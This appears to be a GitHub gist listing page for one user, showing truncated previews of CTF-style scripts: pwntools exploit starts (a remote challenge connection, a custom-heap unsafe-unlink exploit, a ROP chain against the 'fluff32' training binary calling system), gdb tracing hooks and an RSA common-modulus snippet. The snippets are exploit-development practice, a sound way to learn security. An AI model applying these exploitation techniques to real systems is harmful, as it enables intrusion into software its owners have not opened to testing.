Sudhakar Verma sudhackar
🎯
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function bin2string(array){ | |
| var result = ""; | |
| for(var i = 0; i < array.length; ++i){ | |
| result+= (String.fromCharCode(array[i])); | |
| } | |
| return result; | |
| } | |
| function string2bin(str){ | |
| var result = []; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # has some issues, works only 1/2 the times | |
| context(arch='amd64', os='linux', log_level='debug') | |
| # s = remote('127.0.0.1', 5000) | |
| s = remote('waldo.420blaze.in',420) | |
| # raw_input() | |
| s.recvuntil("(y/N) ") | |
| s.sendline("y") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| from pwn import * | |
| ''' | |
| > x86, no protections | |
| > Custom heap | |
| > Out of bounds write | |
| > Unsafe Unlink | |
| > rwx heap+stack | |
| struct chunk{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * gg.c | |
| * | |
| * Copyright 2018 Sudhakar Verma <[email protected]> | |
| * | |
| * This program is free software; you can redistribute it and/or modify | |
| * it under the terms of the GNU General Public License as published by | |
| * the Free Software Foundation; either version 2 of the License, or | |
| * (at your option) any later version. | |
| * |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| e = ELF("./fluff32") | |
| payload = "JUNK"*11 | |
| payload += p32(0x080483e1) # : pop ebx ; ret | |
| payload += p32(e.plt['system']) | |
| payload += p32(0x08048671) # : xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret | |
| payload += "JUNK" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import ctypes | |
| import struct | |
| s = set() | |
| t = set() | |
| for x in range(2**16): | |
| y = (((x & 0xFFC) << 16) - 0x14C437BE) ^ ((x & 0xF0) << 8) | ((x & 0xFFC) << 8) | ((x >> 8) << 24) | x & 0xFC | |
| y = ctypes.c_uint32(y).value | |
| # print hex(x), hex(y) | |
| if not y in s: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import gdb | |
| class MyBreakpoint (gdb.Breakpoint): | |
| def stop (self): | |
| rdi = int(gdb.parse_and_eval("$rdi").cast(gdb.lookup_type('uint64_t'))) | |
| print("x(%x)" % (rdi)), | |
| result = gdb.selected_inferior().read_memory(rdi, 10) | |
| if b'\x00' in result: | |
| result = bytearray(result).split(b'\x00')[0] | |
| if result == b'pol': # breaks if True is returned else just continues |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from Crypto.PublicKey import RSA | |
| from Crypto.Util.number import long_to_bytes | |
| a = RSA.importKey(open("/tmp/key1_pub.pem").read()) | |
| b = RSA.importKey(open("/tmp/key2_pub.pem").read()) | |
| m1 = int(open("/tmp/message1","rb").read().decode("base64").encode("hex"), 16) | |
| m2 = int(open("/tmp/message2","rb").read().decode("base64").encode("hex"), 16) | |
| assert(a.n == b.n) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import gdb | |
| class MyBreakpoint (gdb.Breakpoint): | |
| def stop (self): | |
| rdi = int(gdb.parse_and_eval("$rdi").cast(gdb.lookup_type('uint64_t'))) | |
| rsi = int(gdb.parse_and_eval("$rsi").cast(gdb.lookup_type('uint64_t'))) | |
| print("d( %x, %x)" % (rdi, rsi)), | |
| print("rdi : [%x, %x]" % (int(gdb.Value(rdi).cast(gdb.lookup_type('uint32_t').pointer()).dereference()), | |
| int(gdb.Value(rdi+4).cast(gdb.lookup_type('uint32_t').pointer()).dereference()))), |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * untitled.c | |
| * | |
| * Copyright 2018 Sudhakar Verma <[email protected]> | |
| * | |
| * This program is free software; you can redistribute it and/or modify | |
| * it under the terms of the GNU General Public License as published by | |
| * the Free Software Foundation; either version 2 of the License, or | |
| * (at your option) any later version. | |
| * |